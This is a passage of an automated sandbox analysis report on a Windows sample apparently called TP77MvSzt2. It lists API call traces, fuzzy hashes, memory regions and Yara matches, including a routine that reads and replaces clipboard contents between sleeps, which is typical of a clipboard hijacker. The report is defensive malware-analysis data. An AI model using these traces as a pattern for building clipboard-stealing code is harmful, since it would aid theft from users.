                                                                                  • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                  • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                                                  • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                  • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                                                  APIs
                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                  • String ID:
                                                                                  • API String ID: 323602529-0
                                                                                  • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                  • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                                                  • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                  • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catch
                                                                                  • String ID:
                                                                                  • API String ID: 3886170330-0
                                                                                  • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                  • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                                                  • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                  • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wsopen_s
                                                                                  • String ID:
                                                                                  • API String ID: 3347428461-0
                                                                                  • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                  • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                                                  • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                  • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                  • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                                                  • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                  • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID:
                                                                                  • API String ID: 2005118841-0
                                                                                  • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                  • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                                                  • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                  • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                  • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                  • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                  • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02DAA3B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2da9000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction ID: 8cfac28e9fb4e9a4d8da3c9433555d9e30110192ca4f14243944f3df2b75e9da
                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction Fuzzy Hash: 51111979A00208EFDB01DF98C985E98BBF5AB08751F098094F9489B361D371EA90DF90
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 04831951
                                                                                  • Sleep.KERNEL32(000011EB), ref: 0483195B
                                                                                    • Part of subcall function 0483CE9C: _strlen.LIBCMT ref: 0483CEB3
                                                                                  • OpenClipboard.USER32(00000000), ref: 04831988
                                                                                  • GetClipboardData.USER32(00000001), ref: 04831998
                                                                                  • _strlen.LIBCMT ref: 048319B4
                                                                                  • _strlen.LIBCMT ref: 048319E3
                                                                                  • _strlen.LIBCMT ref: 04831B27
                                                                                  • EmptyClipboard.USER32 ref: 04831B3D
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 04831B4A
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 04831B74
                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 04831B7D
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 04831B84
                                                                                  • CloseClipboard.USER32 ref: 04831BA8
                                                                                  • Sleep.KERNEL32(000002C7), ref: 04831BB3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                  • String ID: 4#E$i
                                                                                  • API String ID: 4246938166-2480119546
                                                                                  • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                  • Instruction ID: d772c66402122ee70e18c0c19f9da58889a2d054d8ccc519cd7140c438303841
                                                                                  • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                  • Instruction Fuzzy Hash: B0510431D00384DAE311DFA8ED49BAD7764FF2A707F045768D801E6162EBB0A685C79A
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 048323B8
                                                                                  • GetClientRect.USER32(?,?), ref: 048323CD
                                                                                  • GetDC.USER32(?), ref: 048323D4
                                                                                  • CreateSolidBrush.GDI32(00646464), ref: 048323E7
                                                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 04832406
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 04832427
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 04832432
                                                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 0483243B
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 0483245F
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 048324EA
                                                                                  • _wcslen.LIBCMT ref: 04832502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1529870607-0
                                                                                  • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                  • Instruction ID: cc3af0029675f4fa7adc0898baadd805a78eda4c212d08b4dc9ec518dc766817
                                                                                  • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                  • Instruction Fuzzy Hash: 98710D72900218AFDB229F68DD85FAEB7BCEB09711F4042E5F609E6151DA74AF80CF54
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                                                  • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0486BD14,?,00000000), ref: 0486BA8E
                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0486BD14,?,00000000), ref: 0486BAB7
                                                                                  • GetACP.KERNEL32(?,?,0486BD14,?,00000000), ref: 0486BACC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 2299586839-711371036
                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction ID: c0da5dfa8596b23760c83382c91a831080be5648eae8d8968c1167c0989455ab
                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                  • Instruction Fuzzy Hash: F621A426706124AAD7B08F54D901A9773A6EF40F6EB568A74E90BD7110FB32FDC0C350
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                  • String ID:
                                                                                  • API String ID: 2287132625-0
                                                                                  • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                  • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                                                  • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                  • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 048621C0
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621CD
                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0486BCD5
                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0486BD30
                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0486BD3F
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,04860A3C,00000040,?,04860B5C,00000055,00000000,?,?,00000055,00000000), ref: 0486BD87
                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,04860ABC,00000040), ref: 0486BDA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                  • String ID:
                                                                                  • API String ID: 2287132625-0
                                                                                  • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                  • Instruction ID: 014ca01423c437a50e477c93ce54f5d08faa44c33b95633d6140c2abdc7c28ae
                                                                                  • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                  • Instruction Fuzzy Hash: 73519571A00229DBEB50DFA9DC45ABE77B8BF04708F044A65E912E7150EBB1BB04CB51
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                  • String ID:
                                                                                  • API String ID: 2444527052-0
                                                                                  • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                  • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                                                  • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                  • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,04860A43,?,?,?,?,0486049A,?,00000004), ref: 0486B373
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0486B403
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0486B411
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,04860A43,00000000,04860B63), ref: 0486B4B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                  • String ID:
                                                                                  • API String ID: 2444527052-0
                                                                                  • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                  • Instruction ID: f685e734ae32d5366a97d96cfaa1cb65e815af93f21f6bb7e6241936355885d6
                                                                                  • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                  • Instruction Fuzzy Hash: B361F871600216AAE764AF79DC41BBB73ACEF04718F144A79EE07D7180EAB4F541C7A2
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: 11@$GetLocaleInfoEx
                                                                                  • API String ID: 2299586839-1075713910
                                                                                  • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                  • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                                                  • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                  • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorInfoLastLocale$_free
                                                                                  • String ID:
                                                                                  • API String ID: 2834031935-0
                                                                                  • Opcode ID: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                  • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                                                  • Opcode Fuzzy Hash: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                  • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0483DAFC), ref: 0485A752
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0483DAFC), ref: 0485A75C
                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0483DAFC), ref: 0485A769
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                                                  • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                                                  • ExitProcess.KERNEL32 ref: 0042FEB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002,00000000), ref: 04860107
                                                                                  • TerminateProcess.KERNEL32(00000000,?,048600BC,00000000,00457970,0000000C,04860213,00000000,00000002,00000000), ref: 0486010E
                                                                                  • ExitProcess.KERNEL32 ref: 04860120
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .$GetProcAddress.$l
                                                                                  • API String ID: 0-2784972518
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0486049A,?,00000004), ref: 0486549A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2299586839-1785270423
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
